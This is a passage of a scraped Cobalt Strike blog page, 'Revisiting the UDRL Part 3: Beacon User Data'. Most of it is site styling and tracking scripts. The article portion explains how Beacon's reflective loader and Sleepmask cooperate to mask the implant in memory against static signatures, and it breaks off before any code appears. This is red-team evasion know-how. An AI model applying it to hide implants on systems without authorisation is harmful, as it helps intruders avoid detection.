!important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-lichen-border-color{border-color: var(--wp--preset--color--lichen) !important;}.has-fern-border-color{border-color: var(--wp--preset--color--fern) !important;}.has-forest-border-color{border-color: var(--wp--preset--color--forest) !important;}.has-dusk-border-color{border-color: var(--wp--preset--color--dusk) !important;}.has-sky-border-color{border-color: var(--wp--preset--color--sky) !important;}.has-cream-border-color{border-color: var(--wp--preset--color--cream) !important;}.has-mint-border-color{border-color: var(--wp--preset--color--mint) !important;}.has-beige-border-color{border-color: var(--wp--preset--color--beige) !important;}.has-blue-border-color{border-color: var(--wp--preset--color--blue) !important;}.has-navy-border-color{border-color: var(--wp--preset--color--navy) !important;}.has-gray-border-color{border-color: var(--wp--preset--color--gray) !important;}.has-charchoal-border-color{border-color: var(--wp--preset--color--charchoal) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='understrap-styles-css' href='https://www.cobaltstrike.com/app/themes/helpsystems/css/style.min.css?ver=1' media='all' /> <link rel='stylesheet' id='swiper-css' href='https://www.cobaltstrike.com/app/themes/helpsystems/js/swiper/swiper-bundle.min.css?ver=8.4.4' media='all' /> <link rel='stylesheet' id='dashicons-css' href='https://www.cobaltstrike.com/wp/wp-includes/css/dashicons.min.css?ver=6.6.2' media='all' /> <script src="https://www.cobaltstrike.com/wp/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script> <script src="https://www.cobaltstrike.com/wp/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script> <script src="https://www.cobaltstrike.com/app/themes/helpsystems/js/popper.min.js?ver=6.6.2" id="popper-js-js"></script> <script src="https://www.cobaltstrike.com/app/themes/helpsystems/js/bootstrap.bundle.min.js?ver=6.6.2" id="bootstrap4-js-js"></script> <script src="https://www.cobaltstrike.com/app/themes/helpsystems/js/shuffle.min.js?ver=6.6.2" id="shuffle-js-js"></script> <script src="https://www.cobaltstrike.com/app/themes/helpsystems/js/custom-javascript.js?ver=1" id="understrap-js-js"></script> <script src="https://www.cobaltstrike.com/app/themes/helpsystems/js/swiper/swiper-bundle.min.js?ver=8.4.4" id="swiper-js"></script> <link rel="https://api.w.org/" href="https://www.cobaltstrike.com/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://www.cobaltstrike.com/wp-json/wp/v2/posts/6252" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.cobaltstrike.com/wp/xmlrpc.php?rsd" /> <meta name="generator" content="WordPress 6.6.2" /> <link rel='shortlink' href='https://www.cobaltstrike.com/?p=6252' /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://www.cobaltstrike.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.cobaltstrike.com%2Fblog%2Frevisiting-the-udrl-part-3-beacon-user-data" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://www.cobaltstrike.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.cobaltstrike.com%2Fblog%2Frevisiting-the-udrl-part-3-beacon-user-data&#038;format=xml" /> <meta name="mobile-web-app-capable" content="yes"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="apple-mobile-web-app-title" content="Cobalt Strike - Adversary Simulation and Red Team Operations"> <style type="text/css" id="filter-everything-inline-css">.wpc-orderby-select{width:100%}.wpc-filters-open-button-container{display:none}.wpc-debug-message{padding:16px;font-size:14px;border:1px dashed #ccc;margin-bottom:20px}.wpc-debug-title{visibility:hidden}.wpc-button-inner,.wpc-chip-content{display:flex;align-items:center}.wpc-icon-html-wrapper{position:relative;margin-right:10px;top:2px}.wpc-icon-html-wrapper span{display:block;height:1px;width:18px;border-radius:3px;background:#2c2d33;margin-bottom:4px;position:relative}span.wpc-icon-line-1:after,span.wpc-icon-line-2:after,span.wpc-icon-line-3:after{content:"";display:block;width:3px;height:3px;border:1px solid #2c2d33;background-color:#fff;position:absolute;top:-2px;box-sizing:content-box}span.wpc-icon-line-3:after{border-radius:50%;left:2px}span.wpc-icon-line-1:after{border-radius:50%;left:5px}span.wpc-icon-line-2:after{border-radius:50%;left:12px}body .wpc-filters-open-button-container a.wpc-filters-open-widget,body .wpc-filters-open-button-container a.wpc-open-close-filters-button{display:inline-block;text-align:left;border:1px solid #2c2d33;border-radius:2px;line-height:1.5;padding:7px 12px;background-color:transparent;color:#2c2d33;box-sizing:border-box;text-decoration:none!important;font-weight:400;transition:none;position:relative}@media screen and (max-width:768px){.wpc_show_bottom_widget .wpc-filters-open-button-container,.wpc_show_open_close_button .wpc-filters-open-button-container{display:block}.wpc_show_bottom_widget .wpc-filters-open-button-container{margin-top:1em;margin-bottom:1em}}</style> <link rel="preconnect" href="https://dev.visualwebsiteoptimizer.com" /> <script id="vwoCode"></script> <style> #teconsent { display: none !important; } </style> <div id="consent_blackbar"></div> <div style="display:none;" id="teconsent"></div> <!-- TrustArc tag start --> <script async="async" src="https://consent.trustarc.com/notice?domain=helpsystems.com&c=teconsent&gtm=1&js=nj&noticeType=bb&text=true&pn=2&cookieLink=https://www.helpsystems.com/cookie-policy&privacypolicylink=https://www.helpsystems.com/privacy-policy" crossorigin=""></script> <script> var __dispatched__ = {}; //Map of previously dispatched preference levels /* First step is to register with the CM API to receive callbacks when a preference update occurs. You must wait for the CM API (PrivacyManagerAPI object) to exist on the page before registering. */ var __i__ = self.postMessage && setInterval(function() { if (self.PrivacyManagerAPI && __i__) { var apiObject = { PrivacyManagerAPI: { action: "getConsentDecision", timestamp: new Date().getTime(), self: self.location.host } }; self.top.postMessage(JSON.stringify(apiObject), "*"); __i__ = clearInterval(__i__); } }, 50); /* Callbacks will occur in the form of a PostMessage event. This code listens for the appropriately formatted PostMessage event, gets the new consent decision, and then pushes the events into the GTM framework. Once the event is submitted, that consent decision is marked in the 'dispatched' map so it does not occur more than once. */ self.addEventListener("message", function(e, d) { try { if (e.data && (d = JSON.parse(e.data)) && (d = d.PrivacyManagerAPI) && d.capabilities && d.action == "getConsentDecision") { var newDecision = self.PrivacyManagerAPI.callApi("getGDPRConsentDecision", self.location.host).consentDecision; newDecision && newDecision.forEach(function(label) { if (!__dispatched__[label]) { self.dataLayer && self.dataLayer.push({ "event": "GDPR Pref Allows " + label }); __dispatched__[label] = 1; } }); } } catch (xx) { /** not a cm api message **/ } }); self.addEventListener("message", function(e, d) { var notice_behavior = getCookie('notice_behavior'); var cmapi_cookie_privacy = getCookie('cmapi_cookie_privacy'); if ((notice_behavior.indexOf('us') > -1 && (document.cookie.indexOf('cmapi_cookie_privacy') < 0 || cmapi_cookie_privacy.indexOf(2) > -1)) || (notice_behavior.indexOf('eu') > -1 && cmapi_cookie_privacy.indexOf(2) > -1)) { vwoConsent(); } }); function getCookie(cname) { let name = cname + "="; let decodedCookie = decodeURIComponent(document.cookie); let ca = decodedCookie.split(';'); for(let i = 0; i <ca.length; i++) { let c = ca[i]; while (c.charAt(0) == ' ') { c = c.substring(1); } if (c.indexOf(name) == 0) { return c.substring(name.length, c.length); } } return ""; } function vwoConsent(){ window._vwo_code || (function() { var account_id=697207, version=2.1, settings_tolerance=2000, hide_element='body', hide_element_style = 'opacity:0 !important;filter:alpha(opacity=0) !important;background:none !important', /* DO NOT EDIT BELOW THIS LINE */ f=false,w=window,d=document,v=d.querySelector('#vwoCode'),cK='_vwo_'+account_id+'_settings',cc={};try{var c=JSON.parse(localStorage.getItem('_vwo_'+account_id+'_config'));cc=c&&typeof c==='object'?c:{}}catch(e){}var stT=cc.stT==='session'?w.sessionStorage:w.localStorage;code={use_existing_jquery:function(){return typeof use_existing_jquery!=='undefined'?use_existing_jquery:undefined},library_tolerance:function(){return typeof library_tolerance!=='undefined'?library_tolerance:undefined},settings_tolerance:function(){return cc.sT||settings_tolerance},hide_element_style:function(){return'{'+(cc.hES||hide_element_style)+'}'},hide_element:function(){if(performance.getEntriesByName('first-contentful-paint')[0]){return''}return typeof cc.hE==='string'?cc.hE:hide_element},getVersion:function(){return version},finish:function(e){if(!f){f=true;var t=d.getElementById('_vis_opt_path_hides');if(t)t.parentNode.removeChild(t);if(e)(new Image).src='https://dev.visualwebsiteoptimizer.com/ee.gif?a='+account_id+e}},finished:function(){return f},addScript:function(e){var t=d.createElement('script');t.type='text/javascript';if(e.src){t.src=e.src}else{t.text=e.text}d.getElementsByTagName('head')[0].appendChild(t)},load:function(e,t){var i=this.getSettings(),n=d.createElement('script'),r=this;t=t||{};if(i){n.textContent=i;d.getElementsByTagName('head')[0].appendChild(n);if(!w.VWO||VWO.caE){stT.removeItem(cK);r.load(e)}}else{var o=new XMLHttpRequest;o.open('GET',e,true);o.withCredentials=!t.dSC;o.responseType=t.responseType||'text';o.onload=function(){if(t.onloadCb){return t.onloadCb(o,e)}if(o.status===200){_vwo_code.addScript({text:o.responseText})}else{_vwo_code.finish('&e=loading_failure:'+e)}};o.onerror=function(){if(t.onerrorCb){return t.onerrorCb(e)}_vwo_code.finish('&e=loading_failure:'+e)};o.send()}},getSettings:function(){try{var e=stT.getItem(cK);if(!e){return}e=JSON.parse(e);if(Date.now()>e.e){stT.removeItem(cK);return}return e.s}catch(e){return}},init:function(){if(d.URL.indexOf('__vwo_disable__')>-1)return;var e=this.settings_tolerance();w._vwo_settings_timer=setTimeout(function(){_vwo_code.finish();stT.removeItem(cK)},e);var t;if(this.hide_element()!=='body'){t=d.createElement('style');var i=this.hide_element(),n=i?i+this.hide_element_style():'',r=d.getElementsByTagName('head')[0];t.setAttribute('id','_vis_opt_path_hides');v&&t.setAttribute('nonce',v.nonce);t.setAttribute('type','text/css');if(t.styleSheet)t.styleSheet.cssText=n;else t.appendChild(d.createTextNode(n));r.appendChild(t)}else{t=d.getElementsByTagName('head')[0];var n=d.createElement('div');n.style.cssText='z-index: 2147483647 !important;position: fixed !important;left: 0 !important;top: 0 !important;width: 100% !important;height: 100% !important;background: white !important;';n.setAttribute('id','_vis_opt_path_hides');n.classList.add('_vis_hide_layer');t.parentNode.insertBefore(n,t.nextSibling)}var o='https://dev.visualwebsiteoptimizer.com/j.php?a='+account_id+'&u='+encodeURIComponent(d.URL)+'&vn='+version;if(w.location.search.indexOf('_vwo_xhr')!==-1){this.addScript({src:o})}else{this.load(o+'&x=true')}}};w._vwo_code=code;code.init();})(); } </script> <!-- TrustArc tag end --> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NN4FLFJ'); </script> <!-- End Google Tag Manager --><link rel="icon" href="https://www.cobaltstrike.com/app/uploads/2023/06/cropped-android-chrome-512x512-2-32x32.png" sizes="32x32" /> <link rel="icon" href="https://www.cobaltstrike.com/app/uploads/2023/06/cropped-android-chrome-512x512-2-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://www.cobaltstrike.com/app/uploads/2023/06/cropped-android-chrome-512x512-2-180x180.png" /> <meta name="msapplication-TileImage" content="https://www.cobaltstrike.com/app/uploads/2023/06/cropped-android-chrome-512x512-2-270x270.png" /> <style id="wp-custom-css"> @media (max-width: 768px) { header #search-box { transform: translateY(40px); } } @media (min-width: 768px) { header #search-box { transform: translateY(-100px); } } .hs-checklist-wrapper .checklist-page-link{ text-decoration: none; } .checklist-page-link:hover .hs-checklist__item{ border-left-color: #77ecc2; } </style> </head> <body class="post-template-default single single-post postid-6252 single-format-standard wp-custom-logo wp-embed-responsive group-blog understrap-has-sidebar"> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-NN4FLFJ" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <div class="site" id="page"> <!-- ******************* The Navbar Area ******************* --> <header id="wrapper-navbar" class="sticky-top"> <a class="skip-link sr-only sr-only-focusable" href="#content">Skip to content</a> <nav id="main-nav" class="navbar navbar-expand-lg navbar-dark pb-lg-0" aria-labelledby="main-nav-label"> <div class="logo-container"> <a href="https://www.cobaltstrike.com/"> <span class="fortra-logo base-logo"> <img src="https://static.fortra.com/fortra-global-assets/fortra-logo-full.svg" width="150" height="24" alt="Fortra" class="logo-full" /> <img src="https://www.cobaltstrike.com/app/themes/helpsystems/img/fortra-delta-white.svg" style="width:33px" alt="fortra mobile logo" class="logo-small"/> </span> <span class="product-logo base-logo"> <img width="200" src="https://www.cobaltstrike.com/app/uploads/2023/06/fta-cobalt-strike-light-1.svg" alt="Cobalt Strike"/> </span> </a> </div> <ul id="top-menu" class="ml-auto navbar-nav"><li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-5494" class="menu-item-5494 nav-item"><a title="Fortra.com" target="_blank" rel="noopener noreferrer" href="https://www.fortra.com/?utm_source=coresecurity.com&#038;utm_medium=referral&#038;utm_campaign=fortra_secondarynav_link" class="nav-link text-nowrap menu-item menu-item-type-custom menu-item-object-custom">Fortra.com</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-2236" class="menu-item-2236 nav-item"><a title="Blog" href="/blog" class="nav-link text-nowrap menu-item menu-item-type-custom menu-item-object-custom">Blog</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-2239" class="menu-item-2239 nav-item"><a title="Download" target="_blank" rel="noopener noreferrer" href="https://download.cobaltstrike.com/download" class="nav-link text-nowrap menu-item menu-item-type-custom menu-item-object-custom">Download</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-2237" class="menu-item-2237 nav-item"><a title="Contact Us" href="/contact-us" class="nav-link text-nowrap menu-item menu-item-type-custom menu-item-object-custom">Contact Us</a></li> </ul> <button class="navbar-toggler border-0" type="button" data-toggle="collapse" data-target="#navbarNavDropdown" aria-controls="navbarNavDropdown" aria-expanded="false" aria-label="Toggle navigation" > <span class="fas fa-bars fa-lg text-white"></span> </button> </nav> <nav id="main-nav" class="navbar navbar-bottom navbar-expand-lg navbar-dark pb-lg-0" aria-labelledby="main-nav-label"> <div class="container-fluid pr-lg-0 d-flex align-items-lg-end"> <h2 id="main-nav-label" class="screen-reader-text"> Main Navigation </h2> <!-- The WordPress Menu goes here --> <div id="navbarNavDropdown" class="collapse navbar-collapse"><ul id="main-menu" class="navbar-nav ml-auto mb-2"><li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-2231" class="menu-btn is-style-btn-2 menu-item menu-item-type-custom menu-item-object-custom menu-item-2231 nav-item"><a title="REQUEST PRICING" href="/product/quote-request" class="nav-link text-nowrap mx-1 text-uppercase">REQUEST PRICING</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4540" class="has-mega-menu menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children dropdown menu-item-4540 nav-item"><a title="Product" href="/product" aria-haspopup="true" aria-expanded="false" class="dropdown-toggle nav-link text-nowrap mx-1 text-uppercase" id="menu-item-dropdown-4540">Product</a> <ul class="dropdown-menu" aria-labelledby="menu-item-dropdown-4540" > <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4350" class="header menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children dropdown menu-item-4350 nav-item"><a title="Features" href="#" class="dropdown-item">Features</a> <ul class="dropdown-menu" aria-labelledby="menu-item-dropdown-4540" > <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4349" class="blue-caret menu-item menu-item-type-post_type menu-item-object-page menu-item-4349 nav-item"><a title="Beacon" href="https://www.cobaltstrike.com/product/features/beacon" class="dropdown-item">Beacon</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-5959" class="blue-caret menu-item menu-item-type-post_type menu-item-object-page menu-item-5959 nav-item"><a title="Malleable C2" href="https://www.cobaltstrike.com/product/features/malleable-c2" class="dropdown-item">Malleable C2</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4348" class="blue-caret menu-item menu-item-type-post_type menu-item-object-page menu-item-4348 nav-item"><a title="Interoperability" href="https://www.cobaltstrike.com/product/features/interoperability" class="dropdown-item">Interoperability</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4351" class="blue-caret menu-item menu-item-type-post_type menu-item-object-page menu-item-4351 nav-item"><a title="Community" href="https://www.cobaltstrike.com/product/features/community" class="dropdown-item">Community</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4457" class="blue-caret menu-item menu-item-type-post_type menu-item-object-page menu-item-4457 nav-item"><a title="Flexibility" href="https://www.cobaltstrike.com/product/features/flexibility" class="dropdown-item">Flexibility</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-5450" class="blue-caret menu-item menu-item-type-post_type menu-item-object-page menu-item-5450 nav-item"><a title="UDRL" href="https://www.cobaltstrike.com/product/features/user-defined-reflective-loader" class="dropdown-item">UDRL</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-2232" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2232 nav-item"><a title="View More Features &gt;" href="/product/features/" class="dropdown-item">View More Features &gt;</a></li> </ul> </li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4352" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children dropdown menu-item-4352 nav-item"><a title="Interoperability" href="#" class="dropdown-item">Interoperability</a> <ul class="dropdown-menu" aria-labelledby="menu-item-dropdown-4540" > <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4353" class="blue-caret menu-item menu-item-type-post_type menu-item-object-page menu-item-4353 nav-item"><a title="Core Impact" href="https://www.cobaltstrike.com/product/core-impact" class="dropdown-item">Core Impact</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4355" class="blue-caret menu-item menu-item-type-post_type menu-item-object-page menu-item-4355 nav-item"><a title="Outflank Security Tooling" href="https://www.cobaltstrike.com/product/outflank-security-tooling" class="dropdown-item">Outflank Security Tooling</a></li> </ul> </li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4356" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children dropdown menu-item-4356 nav-item"><a title="Bundles" href="#" class="dropdown-item">Bundles</a> <ul class="dropdown-menu" aria-labelledby="menu-item-dropdown-4540" > <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4358" class="blue-caret menu-item menu-item-type-custom menu-item-object-custom menu-item-4358 nav-item"><a title="Cobalt Strike + Core Impact" href="/resources/datasheets/advanced-bundle/" class="dropdown-item">Cobalt Strike + Core Impact</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4359" class="blue-caret menu-item menu-item-type-custom menu-item-object-custom menu-item-4359 nav-item"><a title="Cobalt Strike + Outflank Security Tooling" href="/resources/datasheets/red-team-bundle/" class="dropdown-item">Cobalt Strike + Outflank Security Tooling</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4360" class="blue-caret menu-item menu-item-type-custom menu-item-object-custom menu-item-4360 nav-item"><a title="Cobalt Strike, Core Impact, Outflank Security Tooling" href="/resources/datasheets/advanced-red-team-bundle/" class="dropdown-item">Cobalt Strike, Core Impact, Outflank Security Tooling</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4361" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4361 nav-item"><a title="View All Product Bundles &gt;" href="/product/bundles/" class="dropdown-item">View All Product Bundles &gt;</a></li> </ul> </li> </ul> </li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-2235" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children dropdown menu-item-2235 nav-item"><a title="Support" href="/support" aria-haspopup="true" aria-expanded="false" class="dropdown-toggle nav-link text-nowrap mx-1 text-uppercase" id="menu-item-dropdown-2235">Support</a> <ul class="dropdown-menu" aria-labelledby="menu-item-dropdown-2235" > <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4369" class="blue-caret menu-item menu-item-type-post_type menu-item-object-page menu-item-4369 nav-item"><a title="Training" href="https://www.cobaltstrike.com/support/training" class="dropdown-item">Training</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-5490" class="blue-caret menu-item menu-item-type-post_type menu-item-object-page menu-item-5490 nav-item"><a title="User Manuals" href="https://www.cobaltstrike.com/support/user-manuals" class="dropdown-item">User Manuals</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4363" class="blue-caret menu-item menu-item-type-custom menu-item-object-custom menu-item-4363 nav-item"><a title="Community Kit" href="https://cobalt-strike.github.io/community_kit/" class="dropdown-item">Community Kit</a></li> </ul> </li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4541" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children dropdown menu-item-4541 nav-item"><a title="Resources" href="/resources" aria-haspopup="true" aria-expanded="false" class="dropdown-toggle nav-link text-nowrap mx-1 text-uppercase" id="menu-item-dropdown-4541">Resources</a> <ul class="dropdown-menu" aria-labelledby="menu-item-dropdown-4541" > <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4644" class="blue-caret menu-item menu-item-type-custom menu-item-object-custom menu-item-4644 nav-item"><a title="Blog" href="/blog" class="dropdown-item">Blog</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4370" class="blue-caret menu-item menu-item-type-post_type menu-item-object-page menu-item-4370 nav-item"><a title="Screenshots" href="https://www.cobaltstrike.com/resources/screenshots" class="dropdown-item">Screenshots</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4366" class="blue-caret menu-item menu-item-type-custom menu-item-object-custom menu-item-4366 nav-item"><a title="Datasheets" href="/resources/type-datasheet" class="dropdown-item">Datasheets</a></li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-4367" class="blue-caret menu-item menu-item-type-custom menu-item-object-custom menu-item-4367 nav-item"><a title="Videos" href="/resources/type-video" class="dropdown-item">Videos</a></li> </ul> </li> <li itemscope="itemscope" itemtype="https://www.schema.org/SiteNavigationElement" id="menu-item-2238" class="custom-mega-menu-item mx-3 menu-item menu-item-type-custom menu-item-object-custom menu-item-2238 nav-item"><a title=" Search " href="#" class="nav-link text-nowrap mx-1 text-uppercase"><a class=" d-sm-block d-xl-block d-lg-block nav-search jquery-once-1-processed search-show collapsed" href="#collapseSearch" style="width: 122px;color: #fff;text-align:right;padding-right: 1rem;width: 122px!important;height: 26px;position: relative;left: 7px;border: 1px solid #fff;border-radius: 16px;margin: 0.1875rem 0" data-toggle="collapse" role="button" aria-expanded="false" aria-controls="collapseSearch"> <i class="fal fa-search faicon-search fa-xs" aria-hidden="true"></i> <span class="text sr-only">Search</span> </a></a></li> </ul></div> </div><!-- .container --> </nav> <div class="container search-bar fixed-top collapse" id= "collapseSearch" > <div class="row"> <div class="col-12 col-sm-10 offset-sm-1 col-lg-8 offset-lg-2"> <div id="search-box"> <div class="py-3"> <form role="search" class="search-form" method="get" action="https://www.cobaltstrike.com/" > <label class="screen-reader-text" for="s-1">Search for:</label> <div class="input-group"> <input type="search" class="field search-field form-control" id="s-1" name="s" value="" placeholder="Search &hellip;"> <span class="input-group-append"> <input type="submit" class="submit search-submit btn-1 " name="submit" value="Search"> </span> </div> </form> </div> </div> </div> </div> </div> </header><!-- #wrapper-navbar --> <div class="header-banner"> <div class="jumbotron jumbotron-fluid bg-4 " style="background-image: " > <div class="banner-wrapper"> <div class="container"> <p class="yoast-breadcrumbs m-0"><span><span><a href="https://www.cobaltstrike.com/">Home</a></span> » <span><a href="/blog/">Blog</a></span> » <span class="breadcrumb_last" aria-current="page">Revisiting the UDRL Part 3: Beacon User Data</span></span></p> <h1>Revisiting the UDRL Part 3: Beacon User Data</h1> <p class="font-italic">Wednesday 04 September, 2024</p> </div> </div> </div> </div> <div class="wrapper" id="page-wrapper"> <div class="container" id="content" tabindex="-1"> <div class="row"> <div class="col-lg-8 content-area" id="primary"> <main class="site-main" id="main"> <article class="post-6252 post type-post status-publish format-standard hentry product_line-cobalt-strike cornerstone-development cornerstone-red-team cta_type-blog" id="post-6252"> <div class="entry-content"> <p>The UDRL and the Sleepmask are key components of Cobalt Strike’s evasion strategy, yet historically they have not worked well together. For example, prior to <a href="https://www.cobaltstrike.com/blog/cobalt-strike-410-through-the-beacongate" target="_blank" rel="noreferrer noopener">CS 4.10</a>, Beacon statically calculated its location in memory using a combination of its base address and its section table. This calculation was then modified depending on the contents of the user’s malleable C2 profile and passed to the Sleepmask irrespective of the current loader (e.g. default vs UDRL). Therefore, if the UDRL’s loading strategy did not match the malleable C2 settings, the default Sleepmask would either crash or leave parts of Beacon unmasked and susceptible to static signatures.</p> <p>In CS 4.10, we sought to improve the interface between UDRLs and the Sleepmask and decouple it from the malleable C2 profile. As a result, we updated Beacon User Data (BUD) to include information about memory allocated by the loader. This means Beacon can pass accurate section information to the Sleepmask, at runtime, which ensures that it is masked correctly and removes the need for static calculations/heuristics. In addition, it also makes it possible to track arbitrary memory allocations that can be used for things like BOFs/Sleepmasks/additional Postex capabilities. </p> <p>The primary intention of this post is to demonstrate the UDRL&#8217;s role in runtime masking and show how Cobalt Strike&#8217;s two most important evasion tools interact. We will first demonstrate how to track Beacon with BUD. We will then load an External C2 DLL at the same time as Beacon and mask both DLLs at runtime with Sleepmask-VS. For simplicity, we will not cover <a href="https://www.cobaltstrike.com/blog/introducing-the-mutator-kit-creating-object-file-monstrosities-with-sleep-mask-and-llvm" target="_blank" rel="noreferrer noopener">masking the Sleepmask itself</a>.</p> <p>To accompany this post, we have added the extc2-loader example to <a href="https://www.cobaltstrike.com/blog/revisiting-the-udrl-part-1-simplifying-development" target="_blank" rel="noreferrer noopener">UDRL-VS</a> and <code>ExternalC2Sleep()</code> to <a href="https://github.com/Cobalt-Strike/sleepmask-vs/" target="_blank" rel="noreferrer noopener">Sleepmask-VS</a>. It is therefore important to ensure that both tools are compiled and loaded into Cobalt Strike to utilize all the functionality described here.</p> <p class="has-small-font-size"><strong><em>Note: </em></strong><em>UDRL-VS has been tested on Visual Studio Community version <code>17.11.2</code> and Windows 10 SDK <code>10.0.22000.0</code>. Please make sure to use the correct Windows 10 SDK as we have noticed some recent MSVC changes which can impact the project.</em></p> <h2 class="wp-block-heading">Beacon User Data</h2> <p>Beacon User Data (BUD) was originally introduced in 